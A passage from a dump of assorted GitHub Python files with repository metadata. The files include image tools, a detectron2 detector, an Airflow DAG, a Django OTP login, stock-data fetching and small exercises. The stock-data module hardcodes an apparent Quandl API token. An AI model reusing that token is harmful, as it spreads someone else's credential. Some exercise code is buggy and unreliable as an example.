simplify_consecutive_duplicates(df, on_column=\"milestone\"):\n \"\"\"\n remove consecutive turns from the dataframe, to create a simplified flow visualization.\n \"\"\"\n\n rows_to_delete = _find_consecutive_duplicates(df, on_column)\n print(\"Removed {} duplicate {} rows\".format(str(len(rows_to_delete)), on_column))\n result = df[~df[\"log_id\"].isin(rows_to_delete)]\n return result","repo_name":"watson-developer-cloud/assistant-dialog-flow-analysis","sub_path":"src/conversation_analytics_toolkit/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":23997,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"18"} +{"seq_id":"30993104345","text":"from pyxelate import Pyxelate\r\nfrom skimage import io\r\nimport matplotlib.pyplot as plt\r\nimport tkinter as tk\r\n\r\ndef main():\r\n\timg = io.imread(fname_label)\r\n\theight, width, _ = img.shape \r\n\tfactor = 14\r\n\tcolors = colors_label_format\r\n\tdither = True\r\n\r\n\tp = Pyxelate(height // factor, width // factor, colors, dither)\r\n\timg_small = p.convert(img) \r\n\r\n\t_, axes = plt.subplots(1, 2, figsize=(16, 16))\r\n\taxes[0].imshow(img)\r\n\taxes[1].imshow(img_small)\r\n\t# i.savefig(\"res.jpg\")\r\n\tplt.show()\r\n\r\nwindow = tk.Tk()\r\nwindow.geometry(\"400x400\")\r\nwindow.title(\"Pyxel Art generator\")\r\nwindow.resizable(width=True, height=True)\r\nfname_label = tk.Label(window, text=\"\\n\\nВведите название файла:\\n\", font=(\"Arial\", 12))\r\nfname_entry = tk.Entry(window, width=40)\r\nfname_label_format = tk.Label(window, text=\"(допустимые форматы: .png и .jpg) \\n\", font=(\"Arial\", 12), fg=\"orange\")\r\ncolors_label = tk.Label(window, text=\"Введите количество цветов:\\n\", font=(\"Arial\", 12))\r\ncolors_entry = tk.Entry(window, width=20)\r\ncolors_label_format = tk.Label(window, text=\"(от 2 до 32)\\n\", font=(\"Arial\", 12), fg=\"orange\")\r\nbutton = tk.Button(window, text=\"Пикселизировать!\", font=(\"Arial\", 12), command=main)\r\n\r\nfname_label.pack()\r\nfname_entry.pack()\r\nfname_label_format.pack()\r\ncolors_label.pack()\r\ncolors_entry.pack()\r\ncolors_label_format.pack()\r\nbutton.pack()\r\nwindow.mainloop()","repo_name":"Mari525/pyxel-art-generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18120593473","text":"from detectron2.config import get_cfg\nfrom detectron2 import model_zoo\nimport os\nfrom detectron2.engine import DefaultPredictor\nfrom dataset_preprocess.train_test_split import rail_dataset_function\nimport random, cv2\nfrom detectron2.utils.visualizer import Visualizer\nfrom detectron2.data import MetadataCatalog, DatasetCatalog\nfrom detectron2.evaluation import COCOEvaluator, inference_on_dataset\nfrom detectron2.data import build_detection_test_loader\nfrom detectron2.utils.visualizer import ColorMode\nfrom IPython import embed\nimport argparse\nfrom tqdm import tqdm\nimport csv\nimport functools\nfrom dataset_preprocess.xml_to_dict import category_ids\n\nthing_classes = list(category_ids.keys())\n\ndef cmp_only_frame_id(s1,s2):\n\n # first 7 are id\n # print(s1)\n # print(s2)\n s1 = int(s1[:7])\n s2 = int(s2[:7])\n\n # last 5 are id\n # s1 = int(s1[-9:-4])\n # s2 = int(s2[-9:-4])\n\n if s1 < s2:\n return -1\n if s1 > s2:\n return 1\n return 0\n\n\n\n\ndef creat_csv(result_save_dir):\n f = open(result_save_dir+'/detection_result_with_blank_frames.csv', 'w')\n csv_writer = csv.writer(f)\n csv_writer.writerow([\"frame_id\", \"xmin\", \"ymin\", \"xmax\", \"ymax\", \"confidence\",\"class\"])\n\n return f, csv_writer\n\n\n### Loading Trained Faster RCNN Model###\nprint('Loading Faster RCNN Model...')\ncfg = get_cfg()\ncfg.merge_from_file(model_zoo.get_config_file(\"COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml\"))\n# cfg.DATASETS.TRAIN = (\"rail_train\",)\n# cfg.DATASETS.TEST = ()\ncfg.OUTPUT_DIR = './output_'+str(len(thing_classes))+'_things_sleeper_nonfish'\ncfg.DATALOADER.NUM_WORKERS = 2\ncfg.MODEL.ROI_HEADS.NUM_CLASSES = len(thing_classes) # only has one class (ballon). (see https://detectron2.readthedocs.io/tutorials/datasets.html#update-the-config-for-new-datasets)\n# cfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, \"model_0484999.pth\") # path to the model we just trained\ncfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, \"model_0079999.pth\") # path to the model we just trained\ncfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.7 # set a custom testing threshold\ncfg.DATASETS.TEST = ('rail_test',)\ncfg.MODEL.ROI_HEADS.NMS_THRESH_TEST = 0.3\npredictor = DefaultPredictor(cfg)\n\ndata_path = './dataset_preprocess/rail_data/dataset_dicts.npz'\nDatasetCatalog.register(\"rail_\" + \"test\", lambda d=\"test\":rail_dataset_function(data_path, mode=d))\nMetadataCatalog.get(\"rail_\" + \"test\").set(thing_classes=thing_classes)\nrail_metadata = MetadataCatalog.get(\"rail_test\")\n\nprint('Loading Faster RCNN Model... Done!')\n\n\n### Run Model on Costum Dataset and Save CSV file ###\nparser = argparse.ArgumentParser(description='Run Faster R-CNN Detector on Unlabeled Rail Data and Save Result as an CSV')\nparser.add_argument('--result_save_dir', type=str,\n default=\"./detection_result_\"+str(len(thing_classes))+'_things',\n help='It is the folder of detection result csv file')\nparser.add_argument('--rail_data_path', type=str,\n default=\"/run/user/1000/gvfs/smb-share:server=ipl-noaa.local,share=homes/rail/Predator_2018/20180824T194439-0800/GO-2400C-PGE+09-88-35\",\n help='It is the folder of rail data, the last folder should be the haul id, e.g. 20180602T112835-master')\nargs = parser.parse_args()\n\n\nrail_data_path = args.rail_data_path\nresult_save_dir = os.path.join(args.result_save_dir, rail_data_path.split('/')[-3],rail_data_path.split('/')[-2])\n\nvisualization_dir = result_save_dir+'/visualization2'\nif not os.path.exists(result_save_dir):\n os.makedirs(result_save_dir)\n os.makedirs(visualization_dir)\n\nf, csv_writer = creat_csv(result_save_dir)\n\n# sort image names in order\nimage_names = sorted([f for f in os.listdir(rail_data_path) if f!=\"Thumbs.db\"], key=functools.cmp_to_key(cmp_only_frame_id))\n\n\n\nnum = 0\nsaved_num=0\nfor img_name in tqdm(image_names):\n if 'jpg' not in img_name and 'png' not in img_name: # skip non image\n continue\n\n im = cv2.imread(os.path.join(rail_data_path, img_name))\n\n if im is None: # skip bad frame\n print('bad frame: %s' %os.path.join(rail_data_path, img_name))\n continue\n\n outputs = predictor(im) # format is documented at https://detectron2.readthedocs.io/tutorials/models.html#model-output-format\n\n if len(outputs[\"instances\"])==0: ### no predicted objects ###\n csv_writer.writerow([img_name, '', '', '', '', 0, ''])\n continue\n # embed()\n\n\n max_score = 0\n for i in range(len(outputs[\"instances\"])):\n xmin = outputs[\"instances\"].to(\"cpu\").pred_boxes.tensor.numpy()[i][0]\n ymin = outputs[\"instances\"].to(\"cpu\").pred_boxes.tensor.numpy()[i][1]\n xmax = outputs[\"instances\"].to(\"cpu\").pred_boxes.tensor.numpy()[i][2]\n ymax = outputs[\"instances\"].to(\"cpu\").pred_boxes.tensor.numpy()[i][3]\n score = outputs[\"instances\"].scores[i].item()\n cls = outputs[\"instances\"].pred_classes[i].item()\n\n csv_writer.writerow([img_name,xmin,ymin, xmax, ymax,score, thing_classes[cls]])\n\n if score > max_score:\n max_score=score\n\n if max_score >=0.95 and saved_num<=100: # only save 100 HIGH conf samples\n v = Visualizer(im[:, :, ::-1],\n metadata=rail_metadata,\n scale=0.5,\n instance_mode=ColorMode.IMAdataset_preprocessGE_BW # remove the colors of unsegmented pixels. This option is only available for segmentation models\n )\n # print(outputs['instances'].pred_classes)\n # print(outputs[\"instances\"].pred_boxes)\n out = v.draw_instance_predictions(outputs[\"instances\"].to(\"cpu\"))\n cv2.imwrite(os.path.join(visualization_dir, img_name), out.get_image()[:, :, ::-1])\n saved_num+=1\n\n\n num+=1\n # cv2.imshow('inference sample',out.get_image()[:, :, ::-1])\n # cv2.waitKey(3000)\n # cv2.destroyAllWindows()\n\nf.close()\nprint('Detect %d frames with objects in haul %s'%(num, rail_data_path[rail_data_path.rfind('/')+1:]))","repo_name":"ipl-uw/Detection-Tracking-for-NOAA","sub_path":"inference_for_rail.py","file_name":"inference_for_rail.py","file_ext":"py","file_size_in_byte":5974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22995252762","text":"from enum import Enum, auto\n\nclass Color(Enum):\n White = auto(),\n Blue = auto(),\n Yellow = auto(),\n Black = auto(),\n Green = auto(),\n Red = auto()\n\nclass Length(Enum):\n Ankle = auto(),\n Knee = auto(),\n Calf = auto(),\n MidCalf = auto(),\n Crew = auto(),\n QuarterLength = auto()\n\nclass Material(Enum):\n Cotton = auto(),\n Wool = auto(),\n Nylon = auto(),\n Acrylic = auto(),\n Polyester = auto(),\n Spandex = auto()\n\nclass Pattern(Enum):\n Plain = auto(),\n MarkedHeel = auto(),\n MarkedToe = auto(),\n MarkedToeAndHeel = auto(),\n Stars = auto(),\n Stripes = auto()\n\nclass Size(Enum):\n Small = auto(),\n Medium = auto(),\n Large = auto()\n\n","repo_name":"bretgourdie/sock-sorter","sub_path":"SockTraits.py","file_name":"SockTraits.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33962186389","text":"from datetime import timedelta, datetime\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\n\n\ndef firstFunctionExecution(**context):\n context['ti'].xcom_push(key = 'mykey', value = 500)\n print(\"hello airflow\")\n return f\"Hello Airflow! by\"\n\ndef seconfFunctionExecution(**context):\n data= context['ti'].xcom_pull(key= 'mykey')\n print(f'Data passed from first function is {data}')\n\n\nwith DAG(\n dag_id='first_dag',\n schedule_interval='@daily',\n default_args={\n 'owner': 'airflow',\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n 'start_date': datetime(2020, 11, 11)\n },\n catchup= False\n ) as f:\n firstFunctionExecute = PythonOperator(task_id = 'firstFunctionExecution',\n python_callable = firstFunctionExecution,\n op_kwargs = {\"Executor\": 'User'}\n )\n secondFunctionExecute = PythonOperator(task_id = 'secondFunctionExecution',\n python_callable = seconfFunctionExecution\n )\nfirstFunctionExecute >> secondFunctionExecute","repo_name":"emfreak22/AirflowDagGeneratiion","sub_path":"Project/dags/first_dag.py","file_name":"first_dag.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22901643625","text":"word = input()\nupper = word.upper()\ndict = {}\nfor x in upper:\n if x in dict:\n dict[x] += 1\n if x not in dict:\n dict[x] = 1\n\nitems = dict.items()\nmaximum = 0\nmaxcount = 0\nmaxlist = []\nmaxnum = []\ncount = 0\nfor k, v in items:\n if v > maximum:\n maximum = v\n maxlist = k,v\n else:\n continue\nfor k, v in items:\n if v == max(dict.values()):\n count += 1\nif count > 1:\n print(\"?\")\n quit()\nprint(maxlist[0])\n\n\n\n\n\n\n\n\n","repo_name":"justinkmoon1/Baekjoon1","sub_path":"1157.py","file_name":"1157.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75197782439","text":"\nimport quandl\nimport pandas\nimport operator\nimport ModuleAmitException\nimport numpy as np\nimport pandas as pd\n\ndef __init__(self):\n print (\"Calling GetNSELiveData constructor\")\n\n\n\ndef getNSELiveData( nseid):\n Authkey = '5_pRK9pKefuvZzHe-MkSy'\n\n nseid = nseid.replace(\"&\", \"\")\n nseid = nseid.replace(\"-\", \"_\")\n nse_dataset = \"NSE\" + \"/\" + nseid\n mydata = quandl.get(nse_dataset, authtoken=Authkey, rows=252, sort_order=\"desc\")\n return mydata\n\ndef getQuandlData( fullid, nseid):\n Authkey = '5_pRK9pKefuvZzHe-MkSy'\n exceptionDir = {\"NIFTY\":\"NIFTY_50\"}\n nseid = nseid.replace(\"&\", \"\")\n nseid = nseid.replace(\"-\", \"_\")\n \n #first check if the nseid is in expetions\n if nseid in exceptionDir:\n nseid = exceptionDir[nseid]\n \n tokens = fullid.split(':')\n exchange = tokens[0]\n ticker = tokens[1]\n if exchange == \"NSE\" :\n dataset = \"NSE\" + \"/\" + nseid\n elif exchange == \"BOM\" :\n #BSE/BOM526652\n dataset = \"BSE\" + \"/\" + exchange+ticker\n else:\n dataset = \"NSE\" + \"/\" + nseid\n \n mydata = quandl.get(dataset, authtoken=Authkey, rows=252, sort_order=\"desc\")\n return mydata\n\n\ndef getHighLowClose(mydata):\n # print mydata\n df = pandas.DataFrame(mydata)\n dd = df.to_dict(orient='dict')\n ddd = dd['Close']\n\n # print df\n # print dd\n # print ddd\n # print max(ddd, key=ddd.get)\n maxKey = max(ddd.items(), key=operator.itemgetter(1))[0]\n maxVal = ddd.get(maxKey)\n print (\"High52 - \", maxVal)\n\n # print min(ddd, key=ddd.get)\n minKey = min(ddd.items(), key=operator.itemgetter(1))[0]\n minVal = ddd.get(minKey)\n print( \"Low52 - \", minVal)\n\n last_price = df['Close'][0]\n\n print( \"Last Price - \", last_price)\n\n nsedata = dict()\n nsedata[\"high52\"] = maxVal\n nsedata[\"low52\"] = minVal\n nsedata[\"last_price\"] = last_price\n return nsedata\n \n \ndef getLastDayParams(mydata,fullid,nseid):\n df = mydata[:2]\n try:\n # df.columns = ['open', 'high','low','last','close','volume','turnover']\n if \"NIFTY\" in nseid:\n df = df[['Close', 'Shares Traded']]\n elif \"NSE:\" in fullid:\n df = df[['Close', 'Total Trade Quantity']] \n else:\n df = df[['Close', 'No. of Shares']]\n \n df.columns = ['close', 'volume']\n # df = df.drop(['open', 'high','low','turnover'],1)\n # This sript is run india time and Quandl last record by tnat time is \n # already prevous trading day so no need to shift(-1)\n \n #Amit- now that google has stopped api, we need both today and prev day data\n df['prev_close'] = df['close'].shift(-1)\n# df['prev_close'] = df['close']\n #following line is commented bcoz volume as coming NaN for NIFTY and hence df was getting empties\n# df = df.dropna(axis=0, how='any')\n df['change'] = df['close'] - df['prev_close']\n df['percent_change'] = df['change'] / df['prev_close']\n df['percent_change'] = df['percent_change'].apply(lambda x: x*100)\n # np.round(df, decimals=2)\n df = df.apply(lambda x: np.round(x, decimals=2))\n df['nseid'] = nseid\n# print (df)\n except Exception as e:\n print (\"\\n******Amit Exception in NSELiveDataModule::getLastDayParams \")\n print (str(e))\n ModuleAmitException.printInfo()\n df.iloc[0:0] # emptied the dataframe\n \n return df\n \n \n \n\n ","repo_name":"chsivateja/workspace_pyCharm","sub_path":"NSELiveDataModule.py","file_name":"NSELiveDataModule.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21574946289","text":"def kubikwurzel(w,e):\r\n\ttry:float(w) and float(e)\r\n\texcept ValueError:\r\n\t\tif type(w) != float or type(e)!= float:\r\n\t\t\tprint('Wert muss ein Float sein!')\r\n\t\r\n\tfor i in range(1,6):\r\n\t\twert = ((3-1)*wert+w/(wert**(3-1)))/3\r\n\t\twhile abs(wert**3-w)>=epsilon:\r\n\t\t\tif wert**3 bool:\n \"\"\"Determines if the ticket is lucky if the sum of the first three digits\n is equal to the sum of the last three.\n :return bool result. True if ticket is lucky, False if not.\"\"\"\n first_part_ticket = sum(map(int, ticket[:3]))\n second_part_ticket = sum(map(int, ticket[3:]))\n return first_part_ticket == second_part_ticket\n\n\ndef hard_way_determine_lucky_tickets(ticket: str) -> bool:\n \"\"\"Determines if the ticket is lucky if the sum of the even numbers of the ticket\n is equal to the sum of the odd numbers of the ticket.\n :return bool result. True if ticket is lucky, False if not.\"\"\"\n even_numb_sum = 0\n odd_numb_sum = 0\n for numb in ticket:\n if int(numb) % 2 == 0:\n even_numb_sum += int(numb)\n else:\n odd_numb_sum += int(numb)\n return even_numb_sum == odd_numb_sum\n\n\ndef comparison_calculation_methods(min_ticket: str, max_ticket: str):\n \"\"\"Compare easy and hard ways to determine if ticket is lucky. Prints result of comparing.\"\"\"\n lucky_tickets_easy_way = 0\n lucky_tickets_hard_way = 0\n if int(min_ticket) < int(max_ticket):\n for ticket in range(int(min_ticket), int(max_ticket)):\n if easy_way_determine_lucky_tickets(str(ticket)):\n lucky_tickets_easy_way += 1\n if hard_way_determine_lucky_tickets(str(ticket)):\n lucky_tickets_hard_way += 1\n\n if lucky_tickets_easy_way > lucky_tickets_hard_way:\n print(f\"Easy way for counting lucky tickets gives {lucky_tickets_easy_way} lucky tickets, \"\n f\"hard way gives {lucky_tickets_hard_way}\")\n elif lucky_tickets_easy_way < lucky_tickets_hard_way:\n print(f\"Hard way for counting lucky tickets gives {lucky_tickets_easy_way} lucky tickets, \"\n f\"easy way gives {lucky_tickets_hard_way}\")\n\n\nif __name__ == '__main__':\n continue_ = True\n while continue_:\n try:\n min_ticket_numb = input(\"Enter min ticket number: \")\n max_ticket_numb = input(\"Enter max ticket number: \")\n if len(min_ticket_numb) == 6 and len(max_ticket_numb) == 6 and min_ticket_numb < max_ticket_numb:\n comparison_calculation_methods(min_ticket_numb, max_ticket_numb)\n else:\n raise ValueError\n except ValueError:\n print(\"Please enter a positive value consisting of 6 numbers. \"\n \"Min ticket number should be less than max ticket number.\")\n\n continue_ = input(\"Do you want check another tickets (y / n): \").lower() == \"y\"\n","repo_name":"Tanya-Kr/python_simle_tasks","sub_path":"elementaryTasks/6_happy_tickets/lucky_tickets_functional.py","file_name":"lucky_tickets_functional.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74495589481","text":"from ast import Raise\nimport uuid\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, get_user_model\nfrom django.contrib import messages\nfrom .forms import RegisterForm, LoginForm\nfrom .verify import SendOTP\nfrom .check_code import CheckOTP\n\nUser = get_user_model()\n\ndef register_page(request):\n form = RegisterForm(request.POST or None)\n context = {\n \"form\": form\n }\n\n if form.is_valid():\n username = form.cleaned_data.get(\"username\")\n email = form.cleaned_data.get(\"email\")\n phone_number = form.cleaned_data.get(\"phone_number\")\n new_user = User.objects.create_user(username, email, phone_number, password=None)\n return redirect(\"/login\")\n return render(request, \"auth/register.html\", context)\n\n\ndef login_page(request):\n form = LoginForm(request.POST or None)\n context = {\n \"form\": form\n }\n if form.is_valid():\n phone_number = form.cleaned_data.get('phone_number')\n try:\n new = User.objects.get(phone_number=phone_number)\n print(new, \"NEW_YORK_TIMEZONE\")\n ## if user exists\n ##first: send otp to the user \n SendOTP.send_code(phone_number)\n print(\"Bonjour tout le monde\")\n ##second:redirect to the page to enter otp \n temp = uuid.uuid4()\n return redirect(\"/otp/{}/{}\".format(new.pk, temp))\n except Exception as e:\n messages.error(request, f\"No such user exists! {e}\") \n \n return render(request, \"auth/login.html\", context)\n\ndef generate_otp(request, pk, uuid):\n return render(request, 'otp.html')\n\n\ndef check_otp(request):\n otp =request.POST.get(\"secret\")\n phone_number = request.POST.get(\"phone_number\")\n otp_status= CheckOTP.check_otp(phone_number, otp) \n if otp_status == \"approved\":\n try:\n auth_user = User.objects.get(phone_number=phone_number)\n print(auth_user, \"Auth User\")\n user = authenticate(request, email=auth_user.email) \n \n if user is not None:\n login(request, user, backend='verification.auth_backend.PasswordlessAuthBackend')\n return redirect(\"/home\")\n else:\n messages.error(request, \"Wrong OTP!\") \n except:\n Raise(\"User Not Found\")\n\n print(\"otp via form: {}\".format(otp))\n return render(request, \"otp.html\")\n\ndef home_page(request):\n return render(request, \"home_page.html\")","repo_name":"Bamba4/passwordless_django_twilio_send_grid","sub_path":"verification/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75170785961","text":"import pandas as pd\nimport os\n\n\ndef get_xls_list():\n \"\"\" 获取当前目录的xls文件名列表 \"\"\"\n path = os.path.abspath('.')\n all_excel_name = []\n for file in os.listdir(path):\n if file[-3:] == 'xls':\n all_excel_name.append(file)\n return all_excel_name\n\n\n\"\"\"\n read_excel()参数介绍\n io :excel 路径\n sheetname:默认是sheetname为0,返回多表使用sheetname=[0,1],若sheetname=None是返回全表 。注意:int/string返回的是dataframe,而none和list返回的是dict of dataframe。\n header :指定作为列名的行,默认0,即取第一行,数据为列名行以下的数据;若数据不含列名,则设定 header = None;\n skiprows:省略指定行数的数据\n skip_footer:省略从尾部数的行数据\n index_col :指定列为索引列,也可以使用 u’string\n names:指定列的名字,传入一个list数据\n\n\"\"\"\n\n\ndef combine_xls(xlslist):\n \"\"\" 将xls文件合并,参数为xls文件名的列表\"\"\"\n xls_list = xlslist\n combine = []\n for xls in xls_list:\n data = pd.read_excel(xls)\n combine.append(data)\n writer = pd.ExcelWriter('combined.xls')\n pd.concat(combine).to_excel(writer, sheet_name='sheet1', index=False)\n writer.save()\n\n\ndef main():\n combine_xls(get_xls_list())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"L1ttleTomato/file_handling","sub_path":"excelcombine/combine_excel.py","file_name":"combine_excel.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"74841771239","text":"from Web import WebPage\nfrom Web import WebView\nfrom PySide import QtCore\nfrom PySide import QtGui\nfrom PySide import QtNetwork\nfrom PySide import QtWebKit\nimport gc\nimport sys\n\n\nclass mainWindow(QtGui.QWidget) :\n\tdef __init__(self, width = 600, height = 800):\n\t\tsuper(mainWindow, self).__init__()\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.setGeometry(10, 10, self.width, self.height)\n\t\tself.initial()\n\t\t\n\tdef initial(self) :\n\t\tself.MainHLayout = QtGui.QHBoxLayout()\n\t\tself.WebView = WebView()\n\t\t\n\t\tself.WebView.show()\n\t\t\n\t\tself.WebView.load(QtCore.QUrl(\"http://127.0.0.1/tpcdebt/test.php\"))\n\t\t\n\t\tself.MainHLayout.addWidget(self.WebView)\n\t\t\n\t\tself.WebView.loadFinished.connect(self.loadPageOK)\n\t\tself.WebView.page().setLinkDelegationPolicy(QtWebKit.QWebPage.DelegateAllLinks)\n\t\t\n\t\tself.setLayout(self.MainHLayout)\n\t\t\n\t\tself.show()\n\t\t\n\tdef loadPageOK(self, isFinished) :\n\t\tif isFinished :\n\t\t\tprint(\"load OK\")\n\t\t\tpass\n\t\t\t","repo_name":"franksin101/Crawler-and-Server","sub_path":"mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35799112073","text":"from typing import List\n\nfrom webdnn.backend.code_generator.allocator import MemoryLayout\nfrom webdnn.backend.code_generator.injectors.buffer_injector import BufferInjector\nfrom webdnn.backend.code_generator.injectors.kernel_name_injector import KernelNameInjector\nfrom webdnn.backend.webassembly.generator import WebassemblyDescriptorGenerator\nfrom webdnn.backend.webassembly.kernel import Kernel\nfrom webdnn.graph.operators.prod import Prod\n\ntemplate = \"\"\"\nvoid %%FUNC_NAME%%(const int * %%META_BUFFER%%)\n{\n const float *X = %%LOAD_BUFFER(prod_X)%%;\n float *Y = %%LOAD_BUFFER(prod_Y)%%;\n const int *y_stride = %%LOAD_BUFFER(prod_y_stride)%%;\n const int *y_shape = %%LOAD_BUFFER(prod_y_shape)%%;\n const int *x_stride = %%LOAD_BUFFER(prod_x_stride)%%;\n const int D = %%LOAD_BUFFER(prod_D)%%;\n const int N = %%LOAD_BUFFER(prod_N)%%;\n const int MAX_GID = %%LOAD_BUFFER(prod_MAX_GID)%%;\n const int x_target_axis_stride = %%LOAD_BUFFER(prod_x_target_axis_stride)%%;\n\n for (int gid = 0; gid < MAX_GID; gid++) {\n int x_index = 0;\n for (int d = 0; d < D; d++) x_index += ((gid / y_stride[d]) % y_shape[d]) * x_stride[d];\n\n float y = 1.0f;\n for (int i = 0; i < N; i++) {\n const float x = X[x_index];\n\n y *= x;\n\n x_index += x_target_axis_stride;\n }\n\n Y[gid] = y;\n }\n}\n\"\"\"\n\n\n@WebassemblyDescriptorGenerator.register_handler(Prod)\ndef prod_handler(op: Prod, memory_layout: MemoryLayout) -> List[Kernel]:\n x = op.inputs[\"x\"]\n y = op.outputs[\"y\"]\n\n axis = op.parameters[\"axis\"]\n\n buffer_injector = BufferInjector()\n buffer_injector.register({\n \"prod_X\": memory_layout[x],\n \"prod_Y\": memory_layout[y],\n \"prod_y_stride\": y.stride,\n \"prod_y_shape\": y.shape,\n \"prod_x_stride\": [x.stride_dict[a] for a in y.order.axes],\n \"prod_D\": y.ndim,\n \"prod_N\": x.shape_dict[axis],\n \"prod_MAX_GID\": y.size,\n \"prod_x_target_axis_stride\": x.stride_dict[axis]\n })\n\n name_injector = KernelNameInjector(op)\n\n source = template\n source = buffer_injector.inject(source)\n source = name_injector.inject(source)\n\n kernel = Kernel(\n {name_injector.name: source},\n name_injector.name,\n buffer_injector.buffer,\n buffer_injector.unresolved_value_list\n )\n\n return [kernel]\n","repo_name":"LinXueyuanStdio/hash2face","sub_path":"webdnn/src/graph_transpiler/webdnn/backend/webassembly/kernels/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"40236920820","text":"import numpy as np\n\n# create a deck of cards\ndeck = [4, 4, 4, 4, 4, 4, 4, 4, 4, 16]\nknown_cards = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\ntoken_cards = 0\nnum_players = 0\nmin_dealer_score = -1\n\n# nó thắng thằng 17 nó sẽ từ 18 -> 21 sẽ tính xác suất từ 18 -> 21 tính kì vọng\n# cần nhập min_dealer_score\n\n\ndef input_game():\n my_cards = input(\"Nhập bài trên tay của bạn: \")\n my_cards = [min(int(x), 10) for x in my_cards.split()]\n for i in my_cards:\n deck[i - 1] -= 1\n known_cards[i - 1] += 1\n your_cards = input(\"Nhập bài đã biết: \") # không tính trên tay mình\n your_cards = [min(int(x), 10) for x in your_cards.split()]\n for i in your_cards:\n deck[i - 1] -= 1\n known_cards[i - 1] += 1\n token_cards = int(input(\"Số lá đã rút: \"))\n num_players = int(input(\"Số người chơi: \"))\n min_dealer_score = int(input(\"Điểm tối thiểu của người đặt: \"))\n return token_cards, num_players, min_dealer_score\n\n\n# Test\n\ntoken_cards, num_players, min_dealer_score = input_game()\nprint(52 - 2 * num_players - token_cards)\nprint(known_cards)\nprint(deck)\nprint(min_dealer_score)\n","repo_name":"nguyenvanthanhdat/Vietnamese_Blackjack","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1445595513","text":"from time import strftime, time, localtime\nfrom zlib import compressobj\nimport sys\nimport gzip\n\nfrom Trieste.common.utils import getCaller\n\nclass GzipFile (object):\n def __init__ (self, fileName, mode='r'):\n self.file= file (fileName+'.gz', mode)\n self.gzip= compressobj (9)\n\n def write (self, s):\n self.file.write (self.gzip.compress (s))\n\n def close (self):\n self.file.write (self.gzip.flush ())\n self.file.close ()\n\nclass Debugger (object):\n def __init__ (self, fileName=None, compressed=True):\n if fileName:\n if compressed:\n # self.__file= GzipFile (fileName, 'w+', 9)\n self.__file= gzip.open (fileName+'.gz', 'w+', 9)\n else:\n self.__file= file (fileName, 'w+')\n else:\n self.__file= None\n self.__log= []\n\n def __line (self, s):\n now= time ()\n return \"%20.6f: %s\\n\" % (now, s)\n\n def log (self, s):\n # line= self.__line (s)\n # self.__log.append (line)\n # self.__file.write (line)\n self.debug (1, s)\n\n def debug (self, i, s, level=1, fast=True):\n if i==1 or i==5:\n now= time ()\n if fast:\n sys.stderr.write (self.__line (s))\n else:\n (theClass, theMethod, theFileName, theLineNo)= getCaller (level)\n methodStr= \"%s.%s()\" % (theClass, theMethod)\n sys.stderr.write (\"%s [%3d] @ %s.%s: %s\\n\" % (\n methodStr.ljust (20),\n theLineNo,\n strftime (\"%H:%M:%S\", localtime (now)),\n str (round (now-int(now), 4))[2:].ljust (4),\n str(s),\n ))\n\n def saveLog (self):\n return\n if self.__file:\n self.debug (1, 'saving')\n for line in self.__log:\n self.__file.write (line)\n self.__file.close ()\n\nclass Object (object):\n debugger= None\n def __init__ (self, fileName=None, compressed=True):\n if not Object.debugger:\n Object.debugger= Debugger (fileName, compressed)\n self.debug (1, 'o: logging in %s' % fileName)\n else:\n # self.debug (1, 'debugger already there')\n pass\n\n def log (self, s):\n if self.debugger:\n self.debugger.log (s)\n\n def debug (self, i, s, level=1, fast=True):\n if self.debugger:\n self.debugger.debug (i, s, level, fast)\n\n def saveLog (self):\n if self.debugger:\n self.debugger.saveLog ()\n","repo_name":"StyXman/Trieste","sub_path":"Trieste/common/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"22192492278","text":"import frappe\nimport json\nimport math\n\nfrom frappe.utils.data import flt\n# from frappe.utils import getdate\ndef get_context(context):\n context.items = frappe.get_list(\"Website Item\", filters={'published': 1}, fields=[\"item_name\", \"item_code\",\"website_image\"],order_by=\"item_name 